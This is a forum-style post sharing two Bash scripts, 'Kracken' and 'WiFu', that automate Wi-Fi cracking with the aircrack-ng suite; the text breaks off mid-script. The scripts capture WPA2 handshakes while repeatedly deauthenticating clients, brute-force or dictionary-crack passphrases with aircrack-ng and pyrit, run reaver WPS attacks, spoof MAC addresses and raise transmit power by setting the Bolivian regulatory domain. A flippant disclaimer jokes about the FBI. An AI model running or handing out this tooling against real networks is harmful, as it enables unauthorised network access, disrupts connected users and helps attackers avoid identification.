wifi crack SH scripts
wifi crack SH scripts
The Kracken by thisguysayswht
Features:
Wireless interface manipulator.
Hash/rainbow table generator.
Wpa2 Handshake capture
Handshake cracking [pyrit-aircrack] ~ [bruteforce-wordlist-hash tables]
Bruteforce/wordlist time estimation calculator.
Over 55 options in its main and sub menus.
Disclaimer:
I am not responsible for what you do with this code.
If this code sets your computer on fire, I am not responsible.
If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.
This code is designed to test the security of your router, and not anyone else's.
If this code gets you laid, I might take responsibility.
If you use this code, you are agreeing that it is at your own risk.
WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze...
By:thaGH05T
I think which one is better is a matter of preference, but have fun.
Features:
Wireless interface manipulator.
Hash/rainbow table generator.
Wpa2 Handshake capture
Handshake cracking [pyrit-aircrack] ~ [bruteforce-wordlist-hash tables]
Bruteforce/wordlist time estimation calculator.
Over 55 options in its main and sub menus.
- Code:
#!/bin/bash
# ---- Settings ---------------------------------------------------------------
# HANDSHAKE holds a glob pattern, not a single file name: quoting keeps it
# unexpanded here, and it is expanded later by whatever consumes it.
HANDSHAKE="/root/Handshakes/HandShake*.cap"
WORDLIST="/usr/share/wordlists/rockyou.txt"
COWPATTY="/root/Rainbow/cowpatty"
AIROLIB="/root/Rainbow/airolib"
# Interface name passed to the tools started from the menus.
MONITER="mon0"
# ---- End settings -----------------------------------------------------------

# Startup banner and warning; one output line per printf argument.
clear
printf '%s\n' \
  "***********[Kracken V-1.0]***********" \
  "* *" \
  "* Wrtten by: thisguysayswht *" \
  "* *" \
  "**************[WARNING]**************" \
  "* *" \
  "* This script can cause damage to *" \
  "* your hardware and/or network. I *" \
  "* am not responsible for any down *" \
  "* time or damages caused. You are *" \
  "* responsible for scripts you run *" \
  "* *" \
  "********[Use at your own risk]*******" \
  "" \
  "" \
  "======[Press enter to continue]======"

# Wait for the operator to acknowledge the warning. Execution continues
# whatever is typed; an empty answer only adds a short pause and a clear.
read START
if [[ -z $START ]]; then
  sleep 1
  clear
fi
while true
do
clear
echo "*******************[Main Menu]**********************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) View interfaces *"
echo "* (3) Spoof MAC *"
echo "* (4) Boost wireless card *"
echo "* (5) Start moniter interface *"
echo "* (6) Run wash *"
echo "* (7) Run airodump *"
echo "* (8) Capture handshakes *"
echo "* (9) Create rainbow table *"
echo "* (10) Run reaver *"
echo "* (11) Run aircrack-ng *"
echo "* (12) Run pyrit *"
echo "* (13) Restore wireless interface *"
echo "* (14) Bruteforce calculator *"
echo "* *"
echo "* (15) Exit *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
xterm -hold -e "aircrack-ng $HANDSHAKE" & ;;
2)
xterm -hold -e iwconfig & ;;
3)
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS
[[ $WIRELESS == "" ]]
sleep 1
clear
echo "Shutting down $WIRELESS..."
echo ""
sleep 1
ifconfig $WIRELESS down
echo "Changing to random MAC..."
echo ""
sleep 1
macchanger -r $WIRELESS
echo""
echo "Bringing spoffed interface up..."
echo ""
ifconfig $WIRELESS up
sleep 3
clear ;;
4)
clear
echo ""
echo "*****************[WARNING]********************"
echo "* *"
echo "* Setting your wireless card at a power *"
echo "* higher than the OEM spec can damage your *"
echo "* card. *"
echo "* *"
echo "**********************************************"
echo ""
echo ""
echo "========Do you wish to proceed[y/n]?=========="
echo ""
read START
if [[ $START == "y" ]]; then
sleep 1
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS0
[[ $WIRELESS0 == "" ]]
sleep 1
clear
echo "Setting country to BO (Bolivia)..."
echo ""
sleep 1
iw reg set BO
echo "Boosting power on $WIRELESS0..."
echo ""
iwconfig $WIRELESS0 txpower 30
sleep 3
else
echo ""
echo "Returning to script..."
sleep 3
fi;;
5)
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS2
[[ $WIRELESS2 == "" ]]
sleep 1
clear
echo "Starting interface on $WIRELESS2..."
sleep 1
airmon-ng start $WIRELESS2
sleep 3
clear ;;
6)
xterm -hold -e wash -i $MONITER -C & ;;
7)
xterm -hold -e airodump-ng $MONITER & ;;
8)
clear
cd ~
mkdir Handshakes &> /dev/null
echo "**********************************"
echo "* Please enter the network BSSID *"
echo "**********************************"
echo ""
read BSSID
[[ $BSSID == "" ]]
clear
echo "************************************"
echo "* Please enter the network channel *"
echo "************************************"
echo ""
read CHNEL
[[ $CHNEL == "" ]]
xterm -hold -e "airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER" &
sleep 5 &&
xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" & ;;
9)
while true
do
clear
echo "****************[Rainbow tables]********************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) Import rockyou.txt *"
echo "* (3) Import wordlist *"
echo "* (4) Import custom crunch *"
echo "* (5) Add ESSID *"
echo "* (6) Remove ESSID *"
echo "* (7) View ESSIDs *"
echo "* (8) Create rainbow table *"
echo "* (9) View rainbow tables *"
echo "* (10) Export to airolib *"
echo "* (11) Export to cowpatty *"
echo "* *"
echo "* (12) Return to main script *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
clear
xterm -hold -e aircrack-ng $HANDSHAKE & ;;
2)
clear
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
sleep 2
xterm -hold -e "pyrit -i $WORDLIST import_passwords" & ;;
3)
clear
echo "***********************************************"
echo "* Enter full path to password file for import *"
echo "***********************************************"
echo ""
read READES
[[ $READES == "" ]]
xterm -hold -e "pyrit -i '$READES' import_passwords" & ;;
4)
clear
echo "****************************************************"
echo "* What arguments would you like to pass to crunch? *"
echo "****************************************************"
echo ""
read CRUNCH
[[ $CRUNCH == "" ]]
xterm -hold -e "crunch $CRUNCH|pyrit -i- import_passwords" & ;;
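5)
  # Rainbow-table menu, option 5: add an ESSID to the pyrit database.
  clear
  echo "***************"
  echo "* Enter ESSID *"
  echo "***************"
  echo ""
  # -r keeps backslashes in the name literal.
  read -r READES
  # An ESSID is free text chosen by whoever configured the access point, so
  # it is untrusted input. The original spliced it into a single command
  # string that xterm handed to a shell, where a quote character in the name
  # ended the quoting and the rest ran as shell code. Passing the command as
  # separate words makes xterm exec pyrit directly, with the ESSID as one
  # argument and no shell parsing. The original also discarded the result of
  # its empty-input test; an empty answer now simply returns to the menu.
  if [[ -n $READES ]]; then
    xterm -hold -e pyrit -e "$READES" create_essid &
  fi
  ;;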
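6)
  # Rainbow-table menu, option 6: remove an ESSID from the pyrit database.
  clear
  echo "***************"
  echo "* Enter ESSID *"
  echo "***************"
  echo ""
  # -r keeps backslashes in the name literal.
  read -r READES
  # The ESSID is untrusted free text. It is passed to pyrit as a single
  # argument instead of being embedded in a string that a shell re-parses,
  # so quote characters or other shell syntax in the name are not executed.
  # The original discarded the result of its empty-input test; an empty
  # answer now returns to the menu without running anything.
  if [[ -n $READES ]]; then
    xterm -hold -e pyrit -e "$READES" delete_essid &
  fi
  ;;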
7)
clear
xterm -hold -e "pyrit list_essids" & ;;
8)
clear
echo "***************"
echo "* Enter BSSID *"
echo "***************"
echo ""
read READBS
[[ $READBS == "" ]]
xterm -hold -e "pyrit -i- -b $READBS batch" & ;;
9)
clear
xterm -hold -e "pyrit eval" & ;;
10)
clear
cd ~
mkdir Rainbow &> /dev/null
xterm -hold -e "pyrit -o $AIROLIB export_hashdb" & ;;
11)
clear
cd ~
mkdir Rainbow &> /dev/null
xterm -hold -e "pyrit -o $COWPATTY export_hashdb" & ;;
12)
clear
break;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p "";;
esac
sleep 1
done;;
10)
clear
echo "****************************************************"
echo "* Enter BSSID you would like to attack with reaver *"
echo "****************************************************"
echo ""
read RBSSID
[[ $RBSSID == "" ]]
sleep 1
clear
echo "***************************************************************"
echo "* Enter arguments you would like to pass to reaver [optional] *"
echo "***************************************************************"
echo ""
read REAVERA
[[ $REAVERA == "" ]]
echo "Starting reaver attack..."
sleep 3
clear
xterm -hold -e "reaver -i $MONITER -b $RBSSID $REAVERA -vv" & ;;
11)
while true
do
clear
echo "*****************[Aircrack-ng]**********************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) Use rockyou.txt *"
echo "* (3) Bruteforce 8 numeric *"
echo "* (4) Bruteforce 9 numeric *"
echo "* (5) Bruteforce 10 numeric *"
echo "* (6) Bruteforce 8 a-z *"
echo "* (7) Bruteforce 8 A-Z *"
echo "* (8) Bruteforce 8 a-z + numeric *"
echo "* (9) Bruteforce 8 A-Z + numeric *"
echo "* (10) Bruteforce 8 a-z + A-Z *"
echo "* (11) Bruteforce custom *"
echo "* (12) Specify wordlist *"
echo "* (13) Use rainbow table *"
echo "* *"
echo "* (14) Exit to main script *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
xterm -hold -e aircrack-ng $HANDSHAKE & ;;
2)
clear
echo "Decompressing rockyou.txt..."
echo ""
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
sleep 1
echo "Starting attack..."
echo ""
sleep 3
xterm -hold -e aircrack-ng -w $WORDLIST $HANDSHAKE & ;;
3)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
sleep 1
echo "Starting bruteforce 8 numeric"
echo ""
xterm -hold -e "crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
4)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 9 numeric"
echo ""
xterm hold -e "crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
5)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 10 numeric"
echo ""
xterm -hold -e "crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
6)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"#
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 8 a-z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
7)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""#
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 8 A-Z"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
8)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""#
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 8 a-z numeric"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC #$HANDSHAKE" & ;;
9)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
#
echo "Starting bruteforce 8 A-Z numeric"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
10)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
#
echo "Starting bruteforce 8 a-z A-Z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
11)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
clear
echo "****************************************************"
echo "* What arguments would you like to pass to crunch? *"
echo "****************************************************"
echo ""
read CRUNCH
[[ $CRUNCH == "" ]]
echo ""
echo "Starting custom bruteforce attack"
echo ""
xterm -hold -e "crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
12)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
clear
echo "**********************************************"
echo "* Please enter the full path to the wordlist *"
echo "**********************************************"
echo ""
read WCUST
[[ $WCUST == "" ]]
echo ""
echo "Attacking with $WCUST"
echo ""
xterm -hold -e "aircrack-ng -a 2 -w '$WCUST' -b $FKUAC $HANDSHAKE" & ;;
13)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo ""
echo "Attacking with airolib hash table"
echo ""
xterm -hold -e "aircrack-ng -r '$AIROLIB' -b $FKUAC $HANDSHAKE" & ;;
14)
clear
break;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p ""
esac
sleep 1
done;;
12)
while true
do
clear
echo "*********************[Pyrit]************************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) Use rockyou.txt *"
echo "* (3) Bruteforce 8 numeric *"
echo "* (4) Bruteforce 9 numeric *"
echo "* (5) Bruteforce 10 numeric *"
echo "* (6) Bruteforce 8 a-z *"
echo "* (7) Bruteforce 8 A-Z *"
echo "* (8) Bruteforce 8 a-z + numeric *"
echo "* (9) Bruteforce 8 A-Z + numeric *"
echo "* (10) Bruteforce 8 a-z + A-Z *"
echo "* (11) Bruteforce custom *"
echo "* (12) Specify wordlist *"
echo "* (13) Use rainbow table *"
echo "* (14) Benchmark pyrit *"
echo "* *"
echo "* (15) Exit to main script *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
xterm -hold -e aircrack-ng $HANDSHAKE & ;;
2)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Decompressing rockyou.txt..."
echo ""
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
sleep 2
echo "Starting attack..."
echo ""
sleep 3
xterm -hold -e "pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
3)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 numeric"
echo ""
xterm -hold -e "crunch 8 8 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
4)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 9 numeric"
echo ""
xterm -hold -e "crunch 9 9 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
5)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 10 numeric"
echo ""
xterm -hold -e "crunch 10 10 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
6)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 a-z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
7)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 A-Z"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
8)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 a-z numeric"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
9)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 A-Z numeric"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
10)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 a-z A-Z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
11)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
clear
echo "****************************************************"
echo "* What arguments would you like to pass to crunch? *"
echo "****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo ""
echo "Starting custom bruteforce attack"
echo ""
xterm -hold -e "crunch $CRUNCH|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
12)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
clear
echo "**********************************************"
echo "* Please enter the full path to the wordlist *"
echo "**********************************************"
echo ""
read WCUST
[[ $WCUST == "" ]]
echo ""
echo "Attacking with $WCUST"
echo ""
xterm -hold -e "pyrit -i '$WCUST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
13)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo ""
echo "Attacking with rainbow table"
echo ""
xterm -hold -e "pyrit -r '$HANDSHAKE' -b '$PYRITB' attack_db" & ;;
14)
clear
xterm -hold -e "pyrit benchmark" & ;;
15)
clear
break;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p ""
esac
sleep 1
done;;
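13)
  # Main menu, option 13: put a wireless interface back into normal use.
  # Sets the regulatory domain and transmit power, stops the monitor
  # interface, and restores the permanent MAC address.
  clear
  echo "*************************************************"
  echo "* Please select a wireless interface from below *"
  echo "*************************************************"
  echo ""
  iwconfig
  echo ""
  echo "*************************************************"
  echo ""
  read -r WIRELESS3
  # The original tested for an empty answer but discarded the result, so an
  # empty or malformed name was still handed to every command below. Accept
  # only a plausible interface name (short, no whitespace, no leading dash)
  # and quote it wherever it is used.
  iface_re='^[A-Za-z0-9][A-Za-z0-9._:-]{0,14}$'
  if [[ ! $WIRELESS3 =~ $iface_re ]]; then
    clear
    echo "Invalid interface name. Returning to script..."
    sleep 3
  else
    clear
    echo "Resetting country..."
    echo ""
    sleep 1
    # NOTE(review): this sets the same BO domain that the "Boost wireless
    # card" option sets; the domain in force before the boost is never
    # saved, so nothing is actually restored here. Left unchanged because
    # the correct value depends on where the card is operated.
    iw reg set BO
    echo "Resetting power..."
    echo ""
    iwconfig "$WIRELESS3" txpower 20
    sleep 1
    echo "Disabling moniter mode..."
    echo ""
    sleep 1
    airmon-ng stop "$MONITER"
    echo "Shutting down main wireless interface..."
    echo ""
    sleep 1
    ifconfig "$WIRELESS3" down
    echo "Restoring perment MAC..."
    echo ""
    sleep 1
    # -p restores the hardware (permanent) MAC address.
    macchanger -p "$WIRELESS3"
    echo "Bringing main wireless interface back up..."
    echo ""
    sleep 1
    ifconfig "$WIRELESS3" up
    echo "Wireless interface restored"
    echo ""
    sleep 3
  fi
  ;;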
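14)
  # Main menu, option 14: estimate how long trying every entry of a list
  # takes at a given guessing rate. Every step is integer division, so each
  # unit is truncated and values below one unit print as 0.
  clear
  echo "*************************"
  echo "* Enter keys per second *"
  echo "*************************"
  echo ""
  read -r KPS
  clear
  echo "*************************"
  echo "* Enter wordlist length *"
  echo "*************************"
  echo ""
  read -r WLL
  # Bash evaluates text inside (( )) as an expression, so raw input could
  # name variables or carry command substitutions in an array subscript.
  # The original also discarded its empty-input tests and divided by zero
  # when the rate was 0. Accept plain decimal digits only, capped at 18
  # digits so the values fit in a signed 64-bit integer.
  rate_re='^[1-9][0-9]{0,17}$'
  count_re='^[0-9]{1,18}$'
  if [[ ! $KPS =~ $rate_re || ! $WLL =~ $count_re ]]; then
    clear
    echo "Both values must be whole numbers, and keys per second must be at least 1."
    sleep 3
  else
    # 10# forces base 10 so a leading zero is not read as octal.
    A=$(( 10#$WLL / 10#$KPS ))  # seconds
    B=$(( A / 60 ))             # minutes
    C=$(( B / 60 ))             # hours
    D=$(( C / 24 ))             # days
    E=$(( D / 7 ))              # weeks
    F=$(( E / 52 ))             # years
    clear
    echo "****************************"
    echo "* Bruteforce time estimate *"
    echo "****************************"
    echo ""
    echo ""
    echo "SECONDS: $A"
    echo ""
    echo "MINUTES: $B"
    echo ""
    echo "HOURS: $C"
    echo ""
    echo "DAYS: $D"
    echo ""
    echo "WEEKS: $E"
    echo ""
    echo "YEARS: $F"
    echo ""
    echo ""
    echo "*************************"
    echo "* Press enter to return *"
    echo "*************************"
    read -r -p ""
  fi
  ;;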
15)
clear
echo "***********"
echo "* Goodbye *"
echo "***********"
sleep 3
clear
exit;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p "";;
esac
done
./Kracken.sh
Disclaimer:
I am not responsible for what you do with this code.
If this code sets your computer on fire, I am not responsible.
If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.
This code is designed to test the security of your router, and not anyone else's.
If this code gets you laid, I might take responsibility.
If you use this code, you are agreeing that it is at your own risk.
WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze...
By:thaGH05T
- Code:
#!/bin/bash
##################################################################################################
# WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze... #
# #
# v1.0 By:thaGH05T Email support questions to john@ghostlyhaks.com #
##################################################################################################
# This program is free software; you can redistribute it and/or modify it under the terms of the #
# GNU General Public License as published by the Free Software Foundation; either version 2 of #
# the License, or any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See #
# the GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License along with this program; if #
# not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #
# MA 02110-1301, USA. #
##################################################################################################
######### Start by clearing the terminal.
clear
############### Catch ctrl-c input from user
trap main 2
############# Set global functions
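# Cleanup handler, installed for signal 2 (Ctrl+C) by the trap above.
# Stops the mon0 monitor interface, removes the scratch files, then starts a
# fresh copy of this script and terminates the current one.
main () {
  clear
  echo -e "
\e[1;34m[*]\e[0m Please wait while we clean up your mess...
"
  # The original appended this output to .trash.txt in the current directory
  # and deleted the file straight afterwards. A fixed file name in whatever
  # directory the script was started from is a poor target for a root-run
  # script to write to (the loop below exits unless run as root), so the
  # output is discarded instead.
  airmon-ng stop mon0 >/dev/null
  # Other parts of the script still create .trash.txt; -f makes removal a
  # no-op when a file is absent, replacing the separate existence tests.
  rm -f -- .trash.txt .wifi.kate-swp
  sleep 3
  # Quoted so a script path containing spaces is passed as one word.
  # This runs the new copy as a child and returns only when it exits.
  bash "${0}"
  kill "$$"
}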
########### Loop for main menu
mainmenu=1
while [[ $mainmenu == 1 ]] ; do
# Run only as root.
if [ "$(id -u)" != "0" ]; then
echo -e "
\e[1;31m[!]\e[0m \e[1;5m This script must be run as root!!! \e[0m
"
exit 1
else
clear
fi
########### Create variable for the title.
atitle="
\e[31m############################################\e[0m
\e[31m#\e[0m \e[34mWiFu v1.0 - By:thaGH05T\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[34mFor support email john@ghostlyhaks.com\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[34mMaking WiFi cracking easy since 2013\e[0m \e[31m#\e[0m
\e[31m############################################\e[0m
\e[31m (
( ( )\ )
)\))( ' ( (()/( (
((_)()\ ) )\ /(_)) ))\
_(())\_)()((_) (_))_|/((_)
\ \((_)/ / (_) | |_ (_))(
\ \/\/ / | | | __|| || |
\_/\_/ |_| |_| \_,_| \e[0m
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
Wich attack would you like to launch first???
"
################### Set the prompt
prompt="Option: "
################### Set options
options=("Just Listen" "Just Crack" "Spoof MAC" "WPA" "WEP" "DOS" "Main Menu" "Quit")
echo -e "$atitle"
PS3="
$prompt"
#################### What each option does
select opt in "${options[@]}" ; do
case $opt in
###################### Start Just Listen
"Just Listen")
jl=1
while [[ $jl == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
echo -e "
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
sleep 2
airmon-ng start $card >>.trash.txt
airodump-ng mon0
jl=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
;;
##################### Start Just Crack
"Just Crack")
jc=1
while [[ $jc == 1 ]] ; do
clear
echo -e "
\e[1;34m[*]\e[0m What would you like to do? [1|2]
1) Use pre-computed rainbow tables.
2) Use dictionary file or word-list.
"
read crack
if [[ $crack == 1 ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, Using pre computed rainbow tables.
"
sleep 3
clear
echo -e "
\e[1;34m[*]\e[0m What is the ESSID of the targeted network? (If the target network name has spaces make sure to place it in quotations)
"
read essid
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the rainbow tables you will be using? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read rt
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the capture file you want to crack? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read cap
cowpatty –s $essid –d $rt –r $cap || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
jc=0
elif [[ $crack == 2 ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m Ok, using dictionary or word-list
"
sleep 3
clear
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the dictionary or word-list you want to use? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read word
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the ivs file you want to crack? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read ivs
aircrack-ng -l ~/cracked-password.txt -w $word $ivs || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
jc=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid operation. Please try again.
"
sleep 3
fi
done
echo -e "
\e[1;32mAll Done!!!\e[0m - If you used a dictionary or word-list and your passphrase was found then it was saved to cracked-password.txt in your home directory. If you use rainbow tables and your passphrase was found it is listed above so take the time to record it now.
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
#################### Start Spoof MAC
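"Spoof MAC")
  # Give the chosen wireless interface a random MAC address. Repeats the
  # prompt until an acceptable interface name is entered.
  # NOTE(review): the prompt text below talks about monitor mode although
  # this option only changes the MAC; the wording is left as the author
  # wrote it.
  sm=1
  while [[ $sm == 1 ]] ; do
    clear
    echo -e
    ifconfig | grep wlan
    echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
    read -r card
    # An empty answer selects the default shown in the prompt.
    card=${card:-wlan0}
    # The original glob test (wlan*) accepted anything that merely started
    # with "wlan", including text with spaces that the unquoted expansions
    # below split into extra arguments. Require a plain interface name and
    # quote it wherever it is used.
    card_re='^wlan[A-Za-z0-9_.-]*$'
    if [[ $card =~ $card_re ]] ; then
      # Output is discarded rather than appended to a fixed-name scratch
      # file in the current directory while running as root.
      ifconfig "$card" down >/dev/null
      macchanger -r "$card"
      ifconfig "$card" up >/dev/null
      sm=0
    else
      clear
      echo -e "
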